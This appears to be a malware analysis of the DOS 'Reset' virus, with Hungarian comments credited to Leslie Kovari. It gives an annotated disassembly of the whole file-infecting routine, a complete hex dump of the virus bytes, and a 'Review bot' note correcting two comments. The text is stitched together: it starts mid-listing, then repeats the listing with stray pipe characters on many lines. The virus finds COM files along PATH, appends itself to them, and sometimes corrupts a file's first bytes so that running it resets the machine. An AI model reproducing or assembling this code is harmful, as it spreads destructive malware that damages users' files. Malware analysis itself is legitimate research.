;zott egy file a SEC.
;-et 31-re allitja a
;file bejegyzesben
; hour | min. | sec.
;1111 1|111 111|0 0000
114E:02E3 B80157 MOV AX,5701
114E:02E6 CD21 INT 21 ;file keletk. ido beall.
;file zarasa
114E:02E8 B43E MOV AH,3E
114E:02EA CD21 INT 21 ;file zarasa
;eredeti attributum visszaallitasa
114E:02EC B80143 MOV AX,4301
114E:02EF 8B8C0800 MOV CX,[SI+0008] ;CX=0020 /ARC./
114E:02F3 BA1F00 MOV DX,001F
114E:02F6 90 NOP
;DTA. visszaallitasa az eredeti cimre
114E:02F7 03D6 ADD DX,SI
114E:02F9 CD21 INT 21 ;file attr. beallitasa
114E:02FB 1E PUSH DS
114E:02FC B41A MOV AH,1A
114E:02FE 8B940000 MOV DX,[SI+0000]
114E:0302 8E9C0200 MOV DS,[SI+0002]
114E:0306 CD21 INT 21 ;DTA. megadasa
114E:0308 1F POP DS
;az eredeti program futtatasa
114E:0309 59 POP CX
114E:030A 33C0 XOR AX,AX ;reg. nullazasa
114E:030C 33DB XOR BX,BX
114E:030E 33D2 XOR DX,DX
114E:0310 33F6 XOR SI,SI
114E:0312 BF0001 MOV DI,0100
114E:0315 57 PUSH DI ;elteszi a 0100 offsetet
;hogy a RET elo tudja
;venni es odaugrik
114E:0316 33FF XOR DI,DI
114E:0318 C2FFFF RET FFFF ;ugras a 0100-as offset-
;re, ott mar az eredeti
;JMP 117 utasitas van,
;igy vegrehajtodik az
;eredeti prg.
;SP- hogy minek ?
114E:031B 800046 ADD BYTE PTR [BX+SI],46
114E:031E 0D2001 OR AX,0120
114E:0321 2100 AND [BX+SI],AX
114E:0323 2000 AND [BX+SI],AL
114E:0325 EB15 JMP 033C
114E:0327 90 NOP
114E:0328 E91F00 JMP 034A
114E:032B 2A2E434F SUB CH,[4F43]
114E:032F 4D DEC BP
114E:0330 0028 ADD [BX+SI],CH
114E:0332 004703 ADD [BX+03],AL
114E:0335 50 PUSH AX
114E:0336 41 INC CX
114E:0337 54 PUSH SP
114E:0338 48 DEC AX
114E:0339 3D5245 CMP AX,4552
114E:033C 53 PUSH BX
114E:033D 45 INC BP
114E:033E 54 PUSH SP
114E:033F 2E CS:
114E:0340 43 INC BX
114E:0341 4F DEC DI
114E:0342 4D DEC BP
114E:0343 0000 ADD [BX+SI],AL
114E:0345 0000 ADD [BX+SI],AL
114E:0347 4D DEC BP
114E:0348 004449 ADD [SI+49],AL
114E:034B 54 PUSH SP
114E:034C 2E CS:
114E:034D 43 INC BX
114E:034E 4F DEC DI
114E:034F 4D DEC BP
114E:0350 0000 ADD [BX+SI],AL
114E:0352 2020 AND [BX+SI],AH
114E:0354 2020 AND [BX+SI],AH
114E:0356 2020 AND [BX+SI],AH
114E:0358 2020 AND [BX+SI],AH
114E:035A 2020 AND [BX+SI],AH
114E:035C 2020 AND [BX+SI],AH
114E:035E 2020 AND [BX+SI],AH
114E:0360 2020 AND [BX+SI],AH
114E:0362 2020 AND [BX+SI],AH
114E:0364 2020 AND [BX+SI],AH
114E:0366 2020 AND [BX+SI],AH
114E:0368 2020 AND [BX+SI],AH
114E:036A 2020 AND [BX+SI],AH
114E:036C 2020 AND [BX+SI],AH
114E:036E 2020 AND [BX+SI],AH
114E:0370 2020 AND [BX+SI],AH
114E:0372 2020 AND [BX+SI],AH
114E:0374 2020 AND [BX+SI],AH
114E:0376 2020 AND [BX+SI],AH
114E:0378 2020 AND [BX+SI],AH
114E:037A 013F ADD [BX],DI
114E:037C 3F AAS
114E:037D 3F AAS
114E:037E 3F AAS
114E:037F 3F AAS
114E:0380 3F AAS
114E:0381 3F AAS
114E:0382 3F AAS
114E:0383 43 INC BX
114E:0384 4F DEC DI
114E:0385 4D DEC BP
114E:0386 0301 ADD AX,[BX+DI]
114E:0388 0000 ADD [BX+SI],AL
114E:038A 002E8B26 ADD [268B],CH
114E:038E 68 DB 68
114E:038F 2020 AND [BX+SI],AH
114E:0391 0121 ADD [BX+DI],SP
114E:0393 0022 ADD [BP+SI],AH
114E:0395 0000 ADD [BX+SI],AL
114E:0397 005245 ADD [BP+SI+45],DL
114E:039A 53 PUSH BX
114E:039B 45 INC BP
114E:039C 54 PUSH SP
114E:039D 2E CS:
114E:039E 43 INC BX
114E:039F 4F DEC DI
114E:03A0 4D DEC BP
114E:03A1 0000 ADD [BX+SI],AL
114E:03A3 4D DEC BP
114E:03A4 00EA ADD DL,CH
114E:03A6 F0 LOCK
114E:03A7 FF00 INC WORD PTR [BX+SI]
114E:03A9 F0 LOCK
114E:03AA 16 PUSH SS
114E:03AB 7C14 JL 03C1
Dump list:
114E:0000 CD 20 00 A0 00 9A F0 FE-1D F0 F4 02 84 0D 2F 03 . ............/.
114E:0010 84 0D BC 02 84 0D 4C 0D-01 03 01 00 02 FF FF FF ......L.........
114E:0020 FF FF FF FF FF FF FF FF-FF FF FF FF 44 11 4C 01 ............D.L.
114E:0030 BE 10 14 00 18 00 4E 11-FF FF FF FF 00 00 00 00 ......N.........
114E:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
114E:0050 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 .!...........
114E:0060 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 .....
114E:0070 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........
114E:0080 01 20 0D 65 73 65 74 76-2E 63 6F 6D 20 0D 63 3A . .esetv.com .c:
114E:0090 0D 65 6B 5C 64 62 61 73-65 3B 63 3A 5C 6E 79 65 .ek\dbase;c:\nye
114E:00A0 6C 76 65 6B 5C 63 6C 69-70 70 65 72 3B 63 3A 5C lvek\clipper;c:\
114E:00B0 6E 79 65 6C 76 65 6B 5C-66 6C 61 73 68 3B 63 3A nyelvek\flash;c:
114E:00C0 5C 6E 79 65 6C 76 65 6B-5C 70 61 73 63 61 6C 3B \nyelvek\pascal;
114E:00D0 63 3A 5C 75 74 69 6C 0D-00 00 00 00 00 00 00 00 c:\util.........
114E:00E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
114E:00F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
114E:0100 E9 1F 00 49 60 61 6D 20-61 20 52 65 73 65 74 20 ...I`am a Reset
114E:0110 56 49 52 55 53 21 24 BA-03 01 B4 09 CD 21 B4 00 VIRUS!$......!..
114E:0120 CD 20 51 BA 1B 03 FC 8B-F2 81 C6 0A 00 BF 00 01 . Q.............
114E:0130 B9 03 00 F3 A4 8B F2 B4-30 CD 21 3C 00 75 03 E9 ........0.!<.u..
114E:0140 C7 01 06 B4 2F CD 21 89-9C 00 00 8C 84 02 00 07 ..../.!.........
114E:0150 BA 5F 00 90 03 D6 B4 1A-CD 21 06 56 8E 06 2C 00 ._.......!.V..,.
114E:0160 BF 00 00 5E 56 81 C6 1A-00 AC B9 00 80 F2 AE B9 ...^V...........
114E:0170 04 00 AC AE 75 ED E2 FA-5E 07 89 BC 16 00 8B FE ....u...^.......
114E:0180 81 C7 1F 00 8B DE 81 C6-1F 00 8B FE EB 3A 83 BC .............:..
114E:0190 16 00 00 75 03 E9 63 01-1E 56 26 8E 1E 2C 00 8B ...u..c..V&..,..
114E:01A0 FE 26 8B B5 16 00 81 C7-1F 00 AC 3C 3B 74 0A 3C .&.........<;t.<
114E:01B0 00 74 03 AA EB F4 BE 00-00 5B 1F 89 B7 16 00 80 .t.......[......
114E:01C0 7D FF 5C 74 03 B0 5C AA-89 BF 18 00 8B F3 81 C6 }.\t..\.........
114E:01D0 10 00 B9 06 00 F3 A4 8B-F3 B4 4E BA 1F 00 90 03 ..........N.....
114E:01E0 D6 B9 03 00 CD 21 EB 04-B4 4F CD 21 73 02 EB 9E .....!...O.!s...
114E:01F0 8B 84 75 00 24 1F 3C 1F-74 EE 81 BC 79 00 00 FA ..u.$.<.t...y...
114E:0200 77 E6 83 BC 79 00 0A 72-DF 8B BC 18 00 56 81 C6 w...y..r.....V..
114E:0210 7D 00 AC AA 3C 00 75 FA-5E B8 00 43 BA 1F 00 90 }...<.u.^..C....
114E:0220 03 D6 CD 21 89 8C 08 00-B8 01 43 81 E1 FE FF BA ...!......C.....
114E:0230 1F 00 90 03 D6 CD 21 B8-02 3D BA 1F 00 90 03 D6 ......!..=......
114E:0240 CD 21 73 03 E9 A5 00 8B-D8 B8 00 57 CD 21 89 8C .!s........W.!..
114E:0250 04 00 89 94 06 00 B4 2C-CD 21 80 E6 07 75 10 B4 .......,.!...u..
114E:0260 40 B9 05 00 8B D6 81 C2-8A 00 CD 21 EB 65 90 B4 @..........!.e..
114E:0270 3F B9 03 00 BA 0A 00 90-03 D6 CD 21 72 55 3D 03 ?..........!rU=.
114E:0280 00 75 50 B8 02 42 B9 00-00 BA 00 00 CD 21 72 43 .uP..B.......!rC
114E:0290 8B C8 2D 03 00 89 84 0E-00 81 C1 F9 02 8B FE 81 ..-.............
114E:02A0 EF F7 01 89 0D B4 40 B9-88 02 8B D6 81 EA F9 01 ......@.........
114E:02B0 CD 21 72 1F 3D 88 02 75-1A B8 00 42 B9 00 00 BA .!r.=..u...B....
114E:02C0 00 00 CD 21 72 0D B4 40-B9 03 00 8B D6 81 C2 0D ...!r..@........
114E:02D0 00 CD 21 8B 94 06 00 8B-8C 04 00 81 E1 E0 FF 81 ..!.............
114E:02E0 C9 1F 00 B8 01 57 CD 21-B4 3E CD 21 B8 01 43 8B .....W.!.>.!..C.
114E:02F0 8C 08 00 BA 1F 00 90 03-D6 CD 21 1E B4 1A 8B 94 ..........!.....
114E:0300 00 00 8E 9C 02 00 CD 21-1F 59 33 C0 33 DB 33 D2 .......!.Y3.3.3.
114E:0310 33 F6 BF 00 01 57 33 FF-C2 FF FF 80 00 46 0D 20 3....W3......F.
114E:0320 01 21 00 20 00 EB 15 90-E9 1F 00 2A 2E 43 4F 4D .!. .......*.COM
114E:0330 00 28 00 47 03 50 41 54-48 3D 52 45 53 45 54 2E .(.G.PATH=RESET.
114E:0340 43 4F 4D 00 00 00 00 4D-00 44 49 54 2E 43 4F 4D COM....M.DIT.COM
114E:0350 00 00 20 20 20 20 20 20-20 20 20 20 20 20 20 20 ..
114E:0360 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
114E:0370 20 20 20 20 20 20 20 20-20 20 01 3F 3F 3F 3F 3F .?????
114E:0380 3F 3F 3F 43 4F 4D 03 01-00 00 00 2E 8B 26 68 20 ???COM.......&h
114E:0390 20 01 21 00 22 00 00 00-52 45 53 45 54 2E 43 4F .!."...RESET.CO
114E:03A0 4D 00 00 4D 00 EA F0 FF-00 F0 16 7C 14 M..M.......|.
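Review bot: The commentary at 114E:025A misstates the payload trigger: `AND DH,07` followed by `JNZ 026F` takes the destructive path whenever the low three bits of the seconds value are zero, not when the second equals 7, so the overwrite fires on roughly one infection in eight rather than on a single value; the comment should read `;(sec AND 7) = 0 ?` and the heading "ha a masodperc 7 akkor tonkreteszi" should be corrected the same way. The comment `;igen` on `JNZ 02D3` at 114E:02B7 is inverted — the jump is taken when AX differs from 0288, i.e. when the self-copy did not complete — so `;nem` is the accurate annotation there. Both comments appear unchanged in the second copy of this listing that follows.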
@ -0,0 +1,571 @@
Reset virus. Size 682 byte Hex: 02ac byte. Comment by Leslie Kovari
(41) 21-033
Unassemble list:
114E:0100 E91F00 JMP 0122 ;ugras a virus kezdetere
114E:0103 49 DEC CX
114E:0104 60 DB 60
114E:0105 61 DB 61
114E:0106 6D DB 6D
114E:0107 206120 AND [BX+DI+20],AH
114E:010A 52 PUSH DX
114E:010B 65 DB 65
114E:010C 7365 JNB 0173
114E:010E 7420 JZ 0130
114E:0110 56 PUSH SI
114E:0111 49 DEC CX
114E:0112 52 PUSH DX
114E:0113 55 PUSH BP
114E:0114 53 PUSH BX
114E:0115 2124 AND [SI],SP
114E:0117 BA0301 MOV DX,0103 ;az eredeti fertozott
;program kezdete
114E:011A B409 MOV AH,09
114E:011C CD21 INT 21 ;uzenet kepernyore
114E:011E B400 MOV AH,00
114E:0120 CD20 INT 20 ;exit to DOS
114E:0122 51 PUSH CX ;stack-en marad
;a kovetkezo utasitas operandusat fertozeskor
;allitja be, igy mindig a helyes cimre mutat
114E:0123 BA1B03 MOV DX,031B
114E:0126 FC CLD ;elore
114E:0127 8BF2 MOV SI,DX
114E:0129 81C60A00 ADD SI,000A ;SI=031b eredeti 3 byte
114E:012D BF0001 MOV DI,0100 ;program eleje
114E:0130 B90300 MOV CX,0003 ;3 byte
114E:0133 F3 REPZ
114E:0134 A4 MOVSB ;eredeti JMP 117
;visszamasolasa
114E:0135 8BF2 MOV SI,DX
114E:0137 B430 MOV AH,30
114E:0139 CD21 INT 21 ;DOS verzio szam lekerd.
114E:013B 3C00 CMP AL,00
114E:013D 7503 JNZ 0142
114E:013F E9C701 JMP 0309 ;ha 00-as verzio akkor
;nem fertoz a virus s
;futtatja az eredeti
;programot
114E:0142 06 PUSH ES
114E:0143 B42F MOV AH,2F
114E:0145 CD21 INT 21 ;DTA. lekerdezese
114E:0147 899C0000 MOV [SI+0000],BX ;BX= 0080 offset
114E:014B 8C840200 MOV [SI+0002],ES ;eredeti DTA. mentese
114E:014F 07 POP ES
;DTA. beallitasa az ENTRY cimere /dir.-bol/
;ide masolja a find first a file adatait
114E:0150 BA5F00 MOV DX,005F ;DX=037a
114E:0153 90 NOP
114E:0154 03D6 ADD DX,SI
114E:0156 B41A MOV AH,1A
114E:0158 CD21 INT 21 ;DTA. letrehozasa
;037a-tol uj cimre
114E:015A 06 PUSH ES
114E:015B 56 PUSH SI
114E:015C 8E062C00 MOV ES,[002C] ;kornyezet szegmense
114E:0160 BF0000 MOV DI,0000 ;elejetol ES:DI fog a
;kovetkezo dir.-ra mu-
;tatni
114E:0163 5E POP SI
114E:0164 56 PUSH SI
114E:0165 81C61A00 ADD SI,001A ;ezen a cimen levo
;stringet keresi a
;kornyezetbe PATH
114E:0169 AC LODSB ;AL=DS:[SI],SI++
114E:016A B90080 MOV CX,8000 ;32 kbyte
114E:016D F2 REPNZ
114E:016E AE SCASB ;megkeresi a kovetke-
;zo P betut
114E:016F B90400 MOV CX,0004 ;a PATH feliratot keresi
114E:0172 AC LODSB
114E:0173 AE SCASB ;betunkent hasonlitja
114E:0174 75ED JNZ 0163 ;ha nem egyezik a DI.
;karakter /kov.betu/
114E:0176 E2FA LOOP 0172 ;egyezik beolvassa es
;osszehasonlitja a tobbi
;betut is
114E:0178 5E POP SI
114E:0179 07 POP ES ;ES:DI mutat az elso
;PATH-ra
114E:017A 89BC1600 MOV [SI+0016],DI ;a PATH= szo utani file
;spec. cimenek mentese
;PATH mutato
114E:017E 8BFE MOV DI,SI ;SI=031b
114E:0180 81C71F00 ADD DI,001F ;DI=033a
114E:0184 8BDE MOV BX,SI ;BX=031b ezutan BX mu-
;tat az adatokra
114E:0186 81C61F00 ADD SI,001F ;SI=033a
114E:018A 8BFE MOV DI,SI ;DI=033a
114E:018C EB3A JMP 01C8
;A kovetkezo PATH-ban megadott aldirectoryt
;File Path-ra masolja, igy a kovetkezo file-t
;ebben az aldirectoryban keresi
114E:018E 83BC160000 CMP WORD PTR [SI+0016],+00 ;
114E:0193 7503 JNZ 0198
114E:0195 E96301 JMP 02FB ;ha nincs osveny megadva
114E:0198 1E PUSH DS
114E:0199 56 PUSH SI
114E:019A 26 ES:
114E:019B 8E1E2C00 MOV DS,[002C] ;kornyezet szegmense
114E:019F 8BFE MOV DI,SI ;DI=033a
114E:01A1 26 ES:
114E:01A2 8BB51600 MOV SI,[DI+0016] ;a kornyezetbol a path
;masolasa ha az aktualis
;konyvtarban nem talalt
;fertozheto file-t
;a PATH= utanra mutat
;az SI
114E:01A6 81C71F00 ADD DI,001F
114E:01AA AC LODSB ;beolvas a kornyezetbol
;a 0029. byte-ot
114E:01AB 3C3B CMP AL,3B ;pontosvesszo ?
114E:01AD 740A JZ 01B9 ;igen
114E:01AF 3C00 CMP AL,00 ;PATH vege ? nem lesz
;tobb
114E:01B1 7403 JZ 01B6 ;igen
114E:01B3 AA STOSB ;letarol 033a-tol
114E:01B4 EBF4 JMP 01AA
114E:01B6 BE0000 MOV SI,0000
114E:01B9 5B POP BX ;BX=regi SI BX mutat
;az adatokra
114E:01BA 1F POP DS
114E:01BB 89B71600 MOV [BX+0016],SI
;a kovetkezo PATH-ban adott dir. mar atmasolva
114E:01BF 807DFF5C CMP BYTE PTR [DI-01],5C ; \ jel ?
114E:01C3 7403 JZ 01C8 ;igen
114E:01C5 B05C MOV AL,5C ;egyebkent \ iras
;egy aldir. kiertekelese, eloszor az aktualis, majd
;a file path -ra masolt aldir. vegignezese, fertozes
;DI a file path-ba irt aldir. neve utani poz.-ra mu-
;tat
;COM file keresese
114E:01C7 AA STOSB ;\ jel beirasa
114E:01C8 89BF1800 MOV [BX+0018],DI ;ide kell majd a
;file nevet masolni,
;az aldir. neve utan
114E:01CC 8BF3 MOV SI,BX ;SI=031b DI=033d
114E:01CE 81C61000 ADD SI,0010 ;SI=032b
114E:01D2 B90600 MOV CX,0006
114E:01D5 F3 REPZ
114E:01D6 A4 MOVSB ;a *.COM szoveg beirasa
;a PATH= szoveg utan
114E:01D7 8BF3 MOV SI,BX
114E:01D9 B44E MOV AH,4E ;a file adatai a DTA.
;alltal foglalt teru-
;letre
114E:01DB BA1F00 MOV DX,001F
114E:01DE 90 NOP
114E:01DF 03D6 ADD DX,SI
114E:01E1 B90300 MOV CX,0003
114E:01E4 CD21 INT 21 ;elso file bejegyzes ke-
;resese, az it. aktivi-
;zalasa utan felhozza a
;filemeretet, attrib.ot
;keletkezes datumat s
;idejet is!
114E:01E6 EB04 JMP 01EC ;vizsgalatra
114E:01E8 B44F MOV AH,4F
114E:01EA CD21 INT 21 ;kovetkezo file bejegy-
;zes keresese
114E:01EC 7302 JNB 01F0 ;ha nincs hiba
114E:01EE EB9E JMP 018E ;hiba eseten -ha nem
;talal tobb COM file-t
;mas aldirt keres
;mar talalt COM file-t, az adataival az entry fel
;van toltve, a file ellenorzese es fertozese
;kovetkezik
114E:01F0 8B847500 MOV AX,[SI+0075] ;a keletkezesi ido AX-be
;SI=0390
114E:01F4 241F AND AL,1F ;maszk 31 -el
114E:01F6 3C1F CMP AL,1F ;ha 31 akkor mar ferto-
;zott a file!
114E:01F8 74EE JZ 01E8 ;fertozott kovetkezo
;file-t keresi
114E:01FA 81BC790000FA CMP WORD PTR [SI+0079],FA00
114E:0200 77E6 JA 01E8 ;ha > a file meret
;64000 byte-nal
114E:0202 83BC79000A CMP WORD PTR [SI+0079],+0A
114E:0207 72DF JB 01E8 ;ha < 10 byte nal
114E:0209 8BBC1800 MOV DI,[SI+0018] ;DI=033a
;megvan a kivalasztott file
;a file nevet a filespec utan kell masolni
114E:020D 56 PUSH SI ;DI mutat a filespec.re,
;PATH=*.COM
114E:020E 81C67D00 ADD SI,007D ;SI=0398
114E:0212 AC LODSB ;atmasolja a filenevet
;/megkeresett elso v.
;x.edik bejegyzest/
114E:0213 AA STOSB
114E:0214 3C00 CMP AL,00 ;vegere ert ? nevle-
;zaro nullaig masol
114E:0216 75FA JNZ 0212 ;nem
114E:0218 5E POP SI ;SI ujra az adatokra mu-
;tat
;a file egyes eredeti informacioinak megorzese
;hogy a fertozese ne tunjon fel
;minek a file ATTR. megegyszer lekerdezni?
114E:0219 B80043 MOV AX,4300
114E:021C BA1F00 MOV DX,001F ;DS:DX = filespec.
114E:021F 90 NOP
114E:0220 03D6 ADD DX,SI ;DX=031b
114E:0222 CD21 INT 21 ;attributum lekerdezese
;7.6.5.4.3.2.1.0.
;x x a d v s h r
114E:0224 898C0800 MOV [SI+0008],CX ;attributum
114E:0228 B80143 MOV AX,4301
114E:022B 81E1FEFF AND CX,FFFE ;ha Read Only akkor ARC.
;ra valtoztatja
114E:022F BA1F00 MOV DX,001F
114E:0232 90 NOP
114E:0233 03D6 ADD DX,SI ;DX=033a
114E:0235 CD21 INT 21 ;attributum beallitasa
;file nyitasa
114E:0237 B8023D MOV AX,3D02
114E:023A BA1F00 MOV DX,001F
114E:023D 90 NOP
114E:023E 03D6 ADD DX,SI ;DS:DX = filespec.
114E:0240 CD21 INT 21 ;file nyitasa I/O ra
114E:0242 7303 JNB 0247
114E:0244 E9A500 JMP 02EC ;hiba eseten nincs
;fertozes
114E:0247 8BD8 MOV BX,AX ;handle
;a file idejenek lekerdezese de ez is megtalalhato az
;ENTRY teruleten
114E:0249 B80057 MOV AX,5700
114E:024C CD21 INT 21 ;file letrehozasi datum
;es ido bekerese
114E:024E 898C0400 MOV [SI+0004],CX ;ido CH-ora CL-perc
DH-sec DL-1/100
114E:0252 89940600 MOV [SI+0006],DX ;datum
114E:0256 B42C MOV AH,2C
114E:0258 CD21 INT 21 ;rendszerido bekerese
;annak eldontese hogy a filet tonkretegye-e
;ha a masodperc 7 akkor tonkreteszi /aktualis/
114E:025A 80E607 AND DH,07 ;sec = 7 ?
114E:025D 7510 JNZ 026F ;nem - nem tesz tonkre!
;file tonkretetele
114E:025F B440 MOV AH,40
114E:0261 B90500 MOV CX,0005
114E:0264 8BD6 MOV DX,SI ;reset
114E:0266 81C28A00 ADD DX,008A ;DX=03a7 : JMP F000:FFF0
114E:026A CD21 INT 21 ;file elejere ir 5 byte
;-ot a RESET re ugrast!
114E:026C EB65 JMP 02D3
114E:026E 90 NOP
;fertozes
;az eredeti 3 byte megorzese hogy kesobb meg futtatni
;lehessen
114E:026F B43F MOV AH,3F
|
||||
114E:0271 B90300 MOV CX,0003
|
||||
114E:0274 BA0A00 MOV DX,000A
|
||||
114E:0277 90 NOP
|
||||
114E:0278 03D6 ADD DX,SI ;DS:DX = puffer cima DTA
|
||||
114E:027A CD21 INT 21 ;a program eredeti elso
|
||||
;3 byte-jat beolvassa
|
||||
114E:027C 7255 JB 02D3 ;ha hiba van
|
||||
114E:027E 3D0300 CMP AX,0003 ;megvolt a 3 byte ?
|
||||
114E:0281 7550 JNZ 02D3 ;nem
|
||||
|
||||
;file vegere allas az uj cimek kiszamitasa
|
||||
|
||||
114E:0283 B80242 MOV AX,4202
|
||||
114E:0286 B90000 MOV CX,0000
|
||||
114E:0289 BA0000 MOV DX,0000
|
||||
114E:028C CD21 INT 21 ;file vegere pozicional
|
||||
114E:028E 7243 JB 02D3 ;ha hiba volt -nem
|
||||
;nagyon lehet hiba!
|
||||
|
||||
;file elejere irando JMP operandus kiszamitasa
|
||||
|
||||
114E:0290 8BC8 MOV CX,AX ;AX-ben filehossz
|
||||
114E:0292 2D0300 SUB AX,0003 ;AX-ben eltolas a JMP
|
||||
;utasitashoz amit a
|
||||
;file elejere fog irni
|
||||
;igy a JMP a file mos-
|
||||
;tani vege utani bytera
|
||||
;fog mutatni
|
||||
114E:0295 89840E00 MOV [SI+000E],AX ;JMP cim
|
||||
|
||||
;az uj file-on beluli adatterulet cimenek ki-
|
||||
;szamitasa es beallitasa
|
||||
|
||||
114E:0299 81C1F902 ADD CX,02F9 ;az uj file-on beluli
|
||||
;adatteruletre mutat
|
||||
114E:029D 8BFE MOV DI,SI
|
||||
114E:029F 81EFF701 SUB DI,01F7 ;virus elso utasitasa-
|
||||
;nak operandusanak
|
||||
;cime
|
||||
114E:02A3 890D MOV [DI],CX ;ide irja az adatterulet
|
||||
;cimet
|
||||
|
||||
;file moge masolja magat
|
||||
;filemutato a file vegere mutat
|
||||
|
||||
114E:02A5 B440 MOV AH,40
|
||||
114E:02A7 B98802 MOV CX,0288 ;a VIRUS hossza
|
||||
114E:02AA 8BD6 MOV DX,SI ;virus elso bytejara
|
||||
;mutat
|
||||
114E:02AC 81EAF901 SUB DX,01F9
|
||||
114E:02B0 CD21 INT 21 ;a FERTOZES onmagat a
|
||||
;program a fertozendo
|
||||
;program moge irja
|
||||
114E:02B2 721F JB 02D3 ;hiba eseten
|
||||
114E:02B4 3D8802 CMP AX,0288 ;kiirta onmagat ?
|
||||
114E:02B7 751A JNZ 02D3 ;igen
|
||||
|
||||
;az elso 3 byte atallitasa, egy file
|
||||
;vegere mutato ugro utasitasra
|
||||
|
||||
114E:02B9 B80042 MOV AX,4200
|
||||
114E:02BC B90000 MOV CX,0000
|
||||
114E:02BF BA0000 MOV DX,0000
|
||||
114E:02C2 CD21 INT 21 ;file pointer a vegere
|
||||
114E:02C4 720D JB 02D3 ;ha volt hiba -nem le-
|
||||
;het hiba!
|
||||
114E:02C6 B440 MOV AH,40
|
||||
114E:02C8 B90300 MOV CX,0003
|
||||
114E:02CB 8BD6 MOV DX,SI
|
||||
114E:02CD 81C20D00 ADD DX,000D ;DX=0329 ugro utasitasra
|
||||
;mutat
|
||||
114E:02D1 CD21 INT 21 ;3 byte kiirasa a fileba
|
||||
|
||||
;az eredeti ido -mar a fertozesjelzessel egyutt-
|
||||
;visszaallitasa
|
||||
|
||||
114E:02D3 8B940600 MOV DX,[SI+0006] ;datum
|
||||
114E:02D7 8B8C0400 MOV CX,[SI+0004] ;ido
|
||||
114E:02DB 81E1E0FF AND CX,FFE0 ;sec=0 -felesleges!
|
||||
114E:02DF 81C91F00 OR CX,001F ;sec=1f azaz 31, igy
|
||||
;jelzi hogy mar ferto-
|
||||
;zott egy file a SEC.
|
||||
;-et 31-re allitja a
|
||||
;file bejegyzesben
|
||||
; hour | min. | sec.
|
||||
;1111 1|111 111|0 0000
|
||||
114E:02E3 B80157 MOV AX,5701
|
||||
114E:02E6 CD21 INT 21 ;file keletk. ido beall.
|
||||
|
||||
;file zarasa
|
||||
|
||||
114E:02E8 B43E MOV AH,3E
|
||||
114E:02EA CD21 INT 21 ;file zarasa
|
||||
|
||||
;eredeti attributum visszaallitasa
|
||||
|
||||
114E:02EC B80143 MOV AX,4301
|
||||
114E:02EF 8B8C0800 MOV CX,[SI+0008] ;CX=0020 /ARC./
|
||||
114E:02F3 BA1F00 MOV DX,001F
|
||||
114E:02F6 90 NOP
|
||||
|
||||
;DTA. visszaallitasa az eredeti cimre
|
||||
|
||||
114E:02F7 03D6 ADD DX,SI
|
||||
114E:02F9 CD21 INT 21 ;file attr. beallitasa
|
||||
114E:02FB 1E PUSH DS
|
||||
114E:02FC B41A MOV AH,1A
|
||||
114E:02FE 8B940000 MOV DX,[SI+0000]
|
||||
114E:0302 8E9C0200 MOV DS,[SI+0002]
|
||||
114E:0306 CD21 INT 21 ;DTA. megadasa
|
||||
114E:0308 1F POP DS
|
||||
|
||||
;az eredeti program futtatasa
|
||||
|
||||
114E:0309 59 POP CX
|
||||
114E:030A 33C0 XOR AX,AX ;reg. nullazasa
|
||||
114E:030C 33DB XOR BX,BX
|
||||
114E:030E 33D2 XOR DX,DX
|
||||
114E:0310 33F6 XOR SI,SI
|
||||
114E:0312 BF0001 MOV DI,0100
|
||||
114E:0315 57 PUSH DI ;elteszi a 0100 offsetet
|
||||
;hogy a RET elo tudja
|
||||
;venni es odaugrik
|
||||
114E:0316 33FF XOR DI,DI
|
||||
114E:0318 C2FFFF RET FFFF ;ugras a 0100-as offset-
|
||||
;re, ott mar az eredeti
|
||||
;JMP 117 utasitas van,
|
||||
;igy vegrehajtodik az
|
||||
;eredeti prg.
|
||||
;SP- hogy minek ?
|
||||
114E:031B 800046 ADD BYTE PTR [BX+SI],46
|
||||
114E:031E 0D2001 OR AX,0120
|
||||
114E:0321 2100 AND [BX+SI],AX
|
||||
114E:0323 2000 AND [BX+SI],AL
|
||||
114E:0325 EB15 JMP 033C
|
||||
114E:0327 90 NOP
|
||||
114E:0328 E91F00 JMP 034A
|
||||
114E:032B 2A2E434F SUB CH,[4F43]
|
||||
114E:032F 4D DEC BP
|
||||
114E:0330 0028 ADD [BX+SI],CH
|
||||
114E:0332 004703 ADD [BX+03],AL
|
||||
114E:0335 50 PUSH AX
|
||||
114E:0336 41 INC CX
|
||||
114E:0337 54 PUSH SP
|
||||
114E:0338 48 DEC AX
|
||||
114E:0339 3D5245 CMP AX,4552
|
||||
114E:033C 53 PUSH BX
|
||||
114E:033D 45 INC BP
|
||||
114E:033E 54 PUSH SP
|
||||
114E:033F 2E CS:
|
||||
114E:0340 43 INC BX
|
||||
114E:0341 4F DEC DI
|
||||
114E:0342 4D DEC BP
|
||||
114E:0343 0000 ADD [BX+SI],AL
|
||||
114E:0345 0000 ADD [BX+SI],AL
|
||||
114E:0347 4D DEC BP
|
||||
114E:0348 004449 ADD [SI+49],AL
|
||||
114E:034B 54 PUSH SP
|
||||
114E:034C 2E CS:
|
||||
114E:034D 43 INC BX
|
||||
114E:034E 4F DEC DI
|
||||
114E:034F 4D DEC BP
|
||||
114E:0350 0000 ADD [BX+SI],AL
|
||||
114E:0352 2020 AND [BX+SI],AH
|
||||
114E:0354 2020 AND [BX+SI],AH
|
||||
114E:0356 2020 AND [BX+SI],AH
|
||||
114E:0358 2020 AND [BX+SI],AH
|
||||
114E:035A 2020 AND [BX+SI],AH
|
||||
114E:035C 2020 AND [BX+SI],AH
|
||||
114E:035E 2020 AND [BX+SI],AH
|
||||
114E:0360 2020 AND [BX+SI],AH
|
||||
114E:0362 2020 AND [BX+SI],AH
|
||||
114E:0364 2020 AND [BX+SI],AH
|
||||
114E:0366 2020 AND [BX+SI],AH
|
||||
114E:0368 2020 AND [BX+SI],AH
|
||||
114E:036A 2020 AND [BX+SI],AH
|
||||
114E:036C 2020 AND [BX+SI],AH
|
||||
114E:036E 2020 AND [BX+SI],AH
|
||||
114E:0370 2020 AND [BX+SI],AH
|
||||
114E:0372 2020 AND [BX+SI],AH
|
||||
114E:0374 2020 AND [BX+SI],AH
|
||||
114E:0376 2020 AND [BX+SI],AH
|
||||
114E:0378 2020 AND [BX+SI],AH
|
||||
114E:037A 013F ADD [BX],DI
|
||||
114E:037C 3F AAS
|
||||
114E:037D 3F AAS
|
||||
